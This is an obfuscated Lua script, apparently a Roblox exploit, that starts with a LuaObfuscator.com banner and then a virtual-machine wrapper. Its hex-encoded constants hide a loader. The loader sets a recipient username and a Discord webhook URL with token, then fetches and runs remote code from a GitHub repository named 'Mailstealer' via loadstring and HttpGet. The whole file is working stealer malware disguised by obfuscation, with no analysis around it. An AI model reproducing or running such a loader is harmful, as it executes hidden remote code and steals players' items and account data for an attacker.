--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(877 -(282 + 595))) then v83=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(1 + 0)) -(v32-(620 -(555 + (181 -(32 + 85)))))) + (932 -(840 + 17 + 74)))) ;return v83-(v83%(569 -(367 + 45 + 156))) ;end end else local v84=957 -(892 + 65) ;local v85;while true do if (v84==(927 -(214 + (1700 -987)))) then v85=2^(v32-(1271 -(226 + 1044))) ;return (((v31%(v85 + v85))>=v85) and 1) or ((0 -0) + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;return (v36 * (606 -(87 + 263))) + v35 ;end local function v23()local v37=180 -(67 + 113) ;local v38;local v39;local v40;local v41;while true do if (v37==((1 -0) + 0)) then return (v41 * (41190819 -(17770393 + 6643210))) + (v40 * (48199 + 17337)) + (v39 * 256) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (955 -((1799 -(915 + 82)) + 150)) );v18=v18 + (10 -(16 -10)) ;v37=1;end end end local function v24()local v42=v23();local v43=v23();local v44=(773 -(201 + 571)) + (1138 -(116 + 1022)) ;local v45=(v20(v43,1 -0 ,1207 -(1069 + 118) ) * ((8 -6)^(72 -40))) + v42 ;local v46=v20(v43,21,67 -36 );local v47=((v20(v43,6 + 9 + 17 )==(1 -0)) and  -(1 + 0)) or (792 -(368 + 423)) ;if (v46==((0 + 0) -0)) then if (v45==(18 -(10 + 8))) then return v47 * (0 -0) ;else v46=(3 + 0) -2 ;v44=442 -(416 + 26) ;end elseif (v46==(6535 -4488)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(438 -(145 + 293))))) or (v47 * NaN) ;end return v8(v47,v46-((5159 -3706) -((903 -(814 + 45)) + 386)) ) * (v44 + (v45/(2^(1538 -(998 + 488))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1 + 0 ;end if (v49==(2 + 1 + 0)) then return v6(v51);end if (v49==(887 -(261 + 624))) then v51={};for v89=(3 -2) -0 , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=1083 -(1020 + 60) ;end if (v49==(1424 -((2377 -(760 + 987)) + 793))) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=9 -7 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1987 -(1266 + 719))) then v57=nil;v58=nil;v52=606 -(268 + 335) ;end if (4==v52) then while true do if (v53==(292 -(60 + 230))) then local v97=0;while true do if ((1 -0)==v97) then v53=339 -(144 + 192) ;break;end if (v97~=0) then else v58=nil;v59=nil;v97=217 -(42 + 174) ;end end end if (v53==(575 -(426 + 146))) then v60=nil;while true do local v99=0;local v100;while true do if (v99==(0 + 0)) then v100=0 + 0 ;while true do if (v100==(1 + 0)) then if (v54~=(1458 -(282 + 1174))) then else local v151=0;while true do if (v151==(812 -(569 + 242))) then return v58;end if (v151==0) then local v157=0 -0 ;while true do if (0==v157) then for v162=1 + 0 ,v23() do local v163=1024 -(706 + 318) ;local v164;while true do if ((0 -0)~=v163) then else v164=v21();if (v20(v164,1 + 0 ,1252 -(721 + 530) )~=(1271 -(945 + 326))) then else local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if (v174==(1977 -(1913 + 62))) then v179=nil;while true do if (v175==(4 -2)) then while true do if (v176==(7 -4)) then if (v20(v178,3,1936 -(565 + 1368) )~=(3 -2)) then else v179[1665 -(1477 + 184) ]=v60[v179[4]];end v55[v162]=v179;break;end if (1~=v176) then else local v189=0 -0 ;local v190;while true do if (v189~=0) then else v190=0 + 0 ;while true do if (v190==(0 + 0)) then v179={v22(),v22(),nil,nil};if (v177==(304 -(244 + 60))) then local v201=0 + 0 ;local v202;local v203;while true do if (v201~=(0 + 0)) then else v202=1500 -(1408 + 92) ;v203=nil;v201=1;end if (v201==1) then while true do if ((1086 -(461 + 625))~=v202) then else v203=0 + 0 ;while true do if (v203~=0) then else v179[1291 -(993 + 295) ]=v22();v179[1129 -(936 + 189) ]=v22();break;end end break;end end break;end end elseif (v177==1) then v179[3]=v23();elseif (v177==(1 + 1)) then v179[3]=v23() -((1 + 1)^(1629 -(1565 + 48))) ;elseif (v177==(2 + 1)) then local v211=0;local v212;while true do if (v211==(1138 -(782 + 356))) then v212=1171 -(418 + 753) ;while true do if ((0 + 0)~=v212) then else v179[1 + 2 ]=v23() -((1 + 1)^(5 + 11)) ;v179[533 -(406 + 123) ]=v22();break;end end break;end end end v190=1770 -(1749 + 20) ;end if (v190==(1 + 0)) then v176=1324 -(1249 + 73) ;break;end end break;end end end if (v176==(0 + 0)) then local v191=0 + 0 ;local v192;while true do if (v191~=(1145 -(466 + 679))) then else v192=0 -0 ;while true do if (v192==1) then v176=2 -1 ;break;end if (v192==(0 -0)) then local v199=0 -0 ;while true do if (0~=v199) then else local v204=1018 -(697 + 321) ;while true do if ((1900 -(106 + 1794))~=v204) then else v177=v20(v164,5 -3 ,3);v178=v20(v164,8 -4 ,6);v204=1 + 0 ;end if (v204==(1 + 0)) then v199=2 -1 ;break;end end end if (v199==(2 -1)) then v192=115 -(4 + 110) ;break;end end end end break;end end end if (v176==(586 -(57 + 527))) then local v193=1427 -(41 + 1386) ;local v194;while true do if (v193==(103 -(17 + 86))) then v194=0 -0 ;while true do if (v194~=(0 + 0)) then else local v200=0 -0 ;while true do if (v200==(612 -(602 + 9))) then v194=1;break;end if (v200==(0 -0)) then if (v20(v178,167 -(122 + 44) ,1 -0 )~=(948 -(245 + 702))) then else v179[6 -4 ]=v60[v179[2 + 0 ]];end if (v20(v178,6 -4 ,1 + 1 )==(1899 -(260 + 1638))) then v179[1 + 2 ]=v60[v179[5 -2 ]];end v200=66 -(30 + 35) ;end end end if (v194~=1) then else v176=3;break;end end break;end end end end break;end if (v175==(1 + 0)) then local v185=0;while true do if ((1258 -(1043 + 214))==v185) then v175=7 -5 ;break;end if (v185==(0 -0)) then v178=nil;v179=nil;v185=1206 -(902 + 303) ;end end end if (v175~=(0 -0)) then else local v186=1212 -(323 + 889) ;local v187;while true do if (v186==0) then v187=0 -0 ;while true do if (v187==(580 -(361 + 219))) then local v197=320 -(53 + 267) ;while true do if ((1 + 0)==v197) then v187=1 + 0 ;break;end if (v197==(1690 -(1121 + 569))) then v176=0;v177=nil;v197=414 -(15 + 398) ;end end end if (v187==(215 -(22 + 192))) then v175=983 -(18 + 964) ;break;end end break;end end end end break;end if (v174==0) then v175=0 -0 ;v176=nil;v174=1 + 0 ;end if (v174~=(1 + 0)) then else v177=nil;v178=nil;v174=852 -(20 + 830) ;end end end break;end end end for v165=1,v23() do v56[v165-(1 + 0) ]=v28();end v157=127 -(116 + 10) ;end if (v157==(1 + 0)) then v151=766 -(468 + 297) ;break;end end end end end break;end if (v100==(738 -(542 + 196))) then local v106=0;while true do if (v106==(562 -(334 + 228))) then if (v54==(0 -0)) then local v158=0 -0 ;local v159;while true do if (v158==(0 -0)) then v159=0 -0 ;while true do if ((1 + 1)==v159) then v54=1;break;end if ((1 + 0)~=v159) then else v57={};v58={v55,v56,nil,v57};v159=4 -2 ;end if (v159==(0 + 0)) then local v173=0 -0 ;while true do if (v173==(2 -1)) then v159=1;break;end if (v173==0) then v55={};v56={};v173=1 + 0 ;end end end end break;end end end if (v54==(1552 -(1126 + 425))) then local v160=405 -(118 + 287) ;while true do if (v160==(0 -0)) then v59=v23();v60={};v160=1;end if (v160==(2 -1)) then for v167=1 + 0 ,v59 do local v168=1121 -(118 + 1003) ;local v169;local v170;local v171;local v172;while true do if (v168==(0 -0)) then v169=0 + 0 ;v170=nil;v168=1;end if (v168~=(378 -(142 + 235))) then else v171=nil;v172=nil;v168=9 -7 ;end if (v168~=(1 + 1)) then else while true do if (0~=v169) then else local v180=0 + 0 ;while true do if (v180==(977 -(553 + 424))) then v170=0 -0 ;v171=nil;v180=1 + 0 ;end if (v180~=(1 + 0)) then else v169=1 + 0 ;break;end end end if (v169~=1) then else v172=nil;while true do if (v170==(0 + 0)) then local v181=0;local v182;local v183;while true do if (v181~=(0 + 0)) then else v182=0 + 0 ;v183=nil;v181=1 + 0 ;end if (v181~=1) then else while true do if (v182~=(849 -(254 + 595))) then else v183=0 -0 ;while true do if (v183==0) then local v198=0;while true do if (v198==0) then v171=v21();v172=nil;v198=2 -1 ;end if (v198==(2 -1)) then v183=1;break;end end end if (v183==(1 + 0)) then v170=2 -1 ;break;end end break;end end break;end end end if (v170==(4 -3)) then if (v171==(754 -(239 + 514))) then v172=v21()~=(0 + 0) ;elseif (v171==(1331 -(797 + 532))) then v172=v24();elseif (v171~=(3 + 0)) then else v172=v25();end v60[v167]=v172;break;end end break;end end break;end end end v58[2 + 1 ]=v21();v160=4 -2 ;end if (v160~=2) then else v54=1204 -(373 + 829) ;break;end end end v106=1;end if (v106==(2 -1)) then v100=1 -0 ;break;end end end end break;end end end break;end if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=2;end if (v53~=(731 -(476 + 255))) then else local v98=1130 -(369 + 761) ;while true do if (v98==1) then v53=1;break;end if (v98~=0) then else v54=0;v55=nil;v98=1;end end end end break;end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2 -0 ;end if (v52~=3) then else v59=nil;v60=nil;v52=52 -(25 + 23) ;end if (v52==(0 -0)) then v53=238 -(64 + 174) ;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then v63[v79[3]]=v77[v79[2]];elseif (v80>1) then local v107=v79[2];local v108=v77[v79[3]];v77[v107 + 1 ]=v108;v77[v107]=v108[v79[4]];else local v112=v79[2];local v113,v114=v70(v77[v112](v13(v77,v112 + 1 ,v79[3])));v72=(v114 + v112) -1 ;local v115=0;for v135=v112,v72 do v115=v115 + 1 ;v77[v135]=v113[v115];end end elseif (v80<=3) then local v103=0;while true do if (v103==2) then v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v103=3;end if (v103==0) then v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v103=1;end if (v103==1) then v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v103=2;end if (v103==3) then v71=v79[3];break;end end elseif (v80>4) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else local v116;local v117,v118;local v119;local v120;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v120=v79[2];v119=v77[v79[3]];v77[v120 + 1 ]=v119;v77[v120]=v119[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v120=v79[2];v117,v118=v70(v77[v120](v13(v77,v120 + 1 ,v79[3])));v72=(v118 + v120) -1 ;v116=0;for v149=v120,v72 do local v150=0;while true do if (v150==0) then v116=v116 + 1 ;v77[v149]=v117[v116];break;end end end v71=v71 + 1 ;v79=v67[v71];v120=v79[2];v77[v120]=v77[v120](v13(v77,v120 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];end elseif (v80<=8) then if (v80<=6) then v77[v79[2]]=v63[v79[3]];elseif (v80==7) then local v130=0;local v131;while true do if (v130==0) then v131=v79[2];v77[v131]=v77[v131](v13(v77,v131 + 1 ,v72));break;end end else v71=v79[3];end elseif (v80<=9) then v77[v79[2]]();elseif (v80==10) then do return;end else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end if (0==v87) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030D3O00646A6D61737465726D616E3032030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31343536393139342O382O30322O393031382F32636536756E6854594B43444A3045795273482O7267305F664270485F36646F75516E716B576A4762566C5A6133544C454C54647752774D6C5A70385576424C64324F6600163O00120B3O00013O0026053O000D000100020004083O000D000100120B000100043O001204000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026053O0001000100010004083O0001000100120B000100043O001203000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O000A3O00017O00",v9(),...);
